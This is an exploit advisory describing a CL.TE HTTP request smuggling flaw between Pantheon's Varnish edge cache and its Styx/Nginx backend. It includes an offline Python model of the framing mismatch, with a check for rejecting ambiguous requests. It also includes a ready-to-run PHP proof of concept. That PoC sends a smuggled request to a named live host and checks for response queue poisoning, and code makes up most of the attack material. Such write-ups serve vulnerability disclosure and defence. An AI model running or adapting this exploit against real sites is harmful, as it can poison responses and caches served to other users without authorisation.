=============================================================================================================================================
| # Title : HTTP Request Smuggling (CL.TE) via Edge Cache Misconfiguration (Varnish ↔ Styx) |
| # Author : indoushka |
| # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 145.0.2 (64 bits) |
| # Vendor : https://pantheon.io/ |
=============================================================================================================================================
[+] References :
[+] Summary : A critical HTTP Request Smuggling (CL.TE) vulnerability exists due to inconsistent HTTP request framing
between the Pantheon edge caching layer (Varnish) and the backend routing layer (Styx / Nginx).
The edge layer accepts ambiguous requests that carry both Content-Length and Transfer-Encoding and frames the body by Content-Length,
while the backend frames the body by Transfer-Encoding: chunked (the precedence RFC 7230 §3.3.3 gives the chunked encoding when both headers are present).
In the usual naming this front-end-CL / back-end-TE combination is CL.TE. Because the two layers disagree on where one request ends and the next begins,
an attacker can append a second request that the edge forwards as body bytes and the backend treats as the next request on the shared back-end connection,
resulting in response queue poisoning and, where the misdelivered response is cacheable, web cache poisoning.
[+] Technical Details :
Frontend (Varnish Edge Cache)
    Frames the request body using Content-Length
    Does not reject the dual-header ambiguity (CL + TE), so the whole Content-Length span, smuggled bytes included, is forwarded as one request
Backend (Pantheon Styx / Nginx)
    Frames the request body using Transfer-Encoding: chunked, so it stops at the terminating "0" chunk
    Leaves the bytes after the terminating chunk queued as the start of the next request on that connection
[+] Vulnerability Class :
Desynchronization → Response Queue Poisoning → Cache Poisoning
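The framing disagreement above, worked through as an added example (this is not code from the advisory or from Pantheon): two small parsers frame the same bytes the way the edge and the backend are described as doing, so you can see exactly which bytes the backend keeps as the "next" request, why Content-Length has to cover the smuggled request for the desync to occur, and what check an RFC-conformant edge applies to refuse the ambiguous message. The host name and marker are constructed for the demo and nothing touches the network.

```python
"""Added example (not from the advisory): model a CL.TE desynchronisation.

frame_by_content_length() behaves like the described edge (Varnish honours
Content-Length); frame_by_chunked() behaves like the described back end
(Styx/Nginx honours Transfer-Encoding: chunked).  Feeding both the same bytes
shows which bytes the back end leaves in its buffer as the "next" request.
Host name and marker below are constructed for the demo; no network is used.
"""
from typing import Dict, Optional, Tuple

CRLF = b"\r\n"
HOST = b"example.test"                                      # constructed
SMUGGLED = (b"GET /nonexistent-PANTHEON_TECL_POC_123 HTTP/1.1" + CRLF
            + b"Host: " + HOST + CRLF + CRLF)               # constructed


def split_head(raw: bytes) -> Tuple[bytes, Dict[str, str], bytes]:
    """Return (request line, lower-cased header map, bytes after the head)."""
    head, _, rest = raw.partition(CRLF + CRLF)
    lines = head.split(CRLF)
    headers: Dict[str, str] = {}
    for line in lines[1:]:
        name, _, value = line.partition(b":")
        headers[name.strip().lower().decode()] = value.strip().decode()
    return lines[0], headers, rest


def frame_by_content_length(raw: bytes) -> Tuple[bytes, bytes]:
    """Edge behaviour: body = Content-Length bytes; anything after is the next request."""
    _, headers, rest = split_head(raw)
    length = int(headers.get("content-length", "0"))
    return rest[:length], rest[length:]


def frame_by_chunked(raw: bytes) -> Tuple[bytes, bytes]:
    """Back-end behaviour: with Transfer-Encoding: chunked present, decode chunks up to
    the zero-size chunk and ignore Content-Length (RFC 7230 3.3.3). Trailers not modelled."""
    _, headers, rest = split_head(raw)
    if headers.get("transfer-encoding", "").lower() != "chunked":
        return frame_by_content_length(raw)
    body, pos = b"", 0
    while True:
        line_end = rest.index(CRLF, pos)
        size = int(rest[pos:line_end].split(b";")[0].decode(), 16)
        pos = line_end + 2
        if size == 0:
            pos = rest.index(CRLF, pos) + 2        # skip the empty trailer line
            return body, rest[pos:]
        body += rest[pos:pos + size]
        pos += size + 2                            # chunk data + its CRLF


def build_request(host: bytes, smuggled: bytes,
                  content_length: Optional[int] = None) -> bytes:
    """POST carrying both headers. Body = chunk terminator, then the smuggled request.
    content_length=None uses the full body length (the layout that actually desyncs)."""
    body = b"0" + CRLF + CRLF + smuggled
    cl = len(body) if content_length is None else content_length
    return (b"POST / HTTP/1.1" + CRLF
            + b"Host: " + host + CRLF
            + b"Content-Length: " + str(cl).encode() + CRLF
            + b"Transfer-Encoding: chunked" + CRLF + CRLF
            + body)


def backend_leftover(raw: bytes) -> bytes:
    """Bytes the back end will treat as the start of the next request."""
    return frame_by_chunked(raw)[1]


def is_desynced(raw: bytes) -> bool:
    """True when the edge forwards everything as one request while the back end
    keeps bytes for a second one, i.e. the two layers disagree on boundaries."""
    _, edge_leftover = frame_by_content_length(raw)
    return edge_leftover == b"" and backend_leftover(raw) != b""


def is_ambiguous(raw: bytes) -> bool:
    """What a hardened edge checks: both framing headers on one request."""
    _, headers, _ = split_head(raw)
    return "content-length" in headers and "transfer-encoding" in headers


def safe_frame(raw: bytes) -> Tuple[bytes, bytes]:
    """Hardened edge: refuse ambiguous requests instead of guessing (RFC 7230 3.3.3
    permits treating them as an error); otherwise frame exactly as the back end does."""
    if is_ambiguous(raw):
        raise ValueError("400 Bad Request: Content-Length and Transfer-Encoding both present")
    return frame_by_chunked(raw)


if __name__ == "__main__":
    good = build_request(HOST, SMUGGLED)
    print("CL = len(body): desynced =", is_desynced(good))
    print("back end keeps:", backend_leftover(good).split(CRLF)[0].decode())
    short = build_request(HOST, SMUGGLED, content_length=4)   # CL covering only the "0" chunk
    print("CL = 4: desynced =", is_desynced(short))
```

With Content-Length covering the whole body the edge forwards one POST and the backend is left holding the smuggled GET, which it answers as the next request on that connection; with a Content-Length that covers only the chunk terminator, both layers see the smuggled GET as a separate pipelined request and no desync occurs. The same two-parser comparison is the cheapest offline way to sanity-check a smuggling payload before sending it anywhere.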
[+] Proof of Concept (PoC)
The following PoC demonstrates the desync by appending a harmless smuggled GET (a non-existent path tagged with a random marker) to a POST that carries both headers,
then sending a legitimate GET on the same connection and checking whether the response to that GET carries the marker, i.e. whether the smuggled request's response was returned in its place.
Because the back-end connection is shared, the misdelivered response may land on another client's request rather than on the trigger, so a negative result on one attempt is not conclusive.
[+] PoC : poc_final.php
<?php
/**
 * Proof of Concept: HTTP Request Smuggling (CL.TE)
 * Target: Pantheon-hosted application
 *
 * The edge frames the POST by Content-Length, so Content-Length must cover
 * the chunk terminator AND the smuggled request; the backend frames it by
 * Transfer-Encoding, stops at the "0" chunk and leaves the smuggled request
 * in its buffer, where it is answered in place of the next request on that
 * connection.
 */
error_reporting(E_ALL);
$host     = "www.bugcrowd.com"; // Pantheon-hosted example
$asset    = "/etc/designs/bugcrowd/clientlibs/main.js";
$poc_mark = "PANTHEON_TECL_POC_" . rand(100, 999);

$fp = fsockopen("ssl://$host", 443, $errno, $errstr, 15);
if (!$fp) die("[-] Connection Failed: $errstr ($errno)\n");
stream_set_timeout($fp, 15); // fsockopen's timeout covers the connect only

// Smuggled request: a harmless GET whose path carries the marker
$smuggled  = "GET /nonexistent-$poc_mark HTTP/1.1\r\n";
$smuggled .= "Host: $host\r\n";
$smuggled .= "Connection: keep-alive\r\n\r\n";

// Main CL.TE request: chunk terminator first, smuggled request after it
$body     = "0\r\n\r\n" . $smuggled;
$request  = "POST / HTTP/1.1\r\n";
$request .= "Host: $host\r\n";
$request .= "Transfer-Encoding: chunked\r\n";
$request .= "Content-Length: " . strlen($body) . "\r\n"; // whole body, not just "0\r\n\r\n"
$request .= "Connection: keep-alive\r\n\r\n";
$request .= $body;
fwrite($fp, $request);
usleep(600000); // let the edge forward the POST before the trigger arrives

// Trigger request on the same connection; Connection: close so the read loop terminates
fwrite($fp, "GET $asset HTTP/1.1\r\nHost: $host\r\nConnection: close\r\n\r\n");
$response = "";
while (!feof($fp)) {
    $line = fgets($fp, 1024);
    if ($line === false) break; // read timeout or socket error
    $response .= $line;
}
fclose($fp);

// Detection relies on the 404 body echoing the requested path; if the target's
// error page does not, compare the status line / Content-Type with a normal
// response for $asset instead.
if (strpos($response, $poc_mark) !== false) {
    echo "[+] SUCCESS: Response queue poisoned via CL.TE.\n";
} else {
    echo "[-] Marker not observed; responses were not desynchronized on this attempt.\n";
}
?>
Greetings to :=====================================================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
===================================================================================================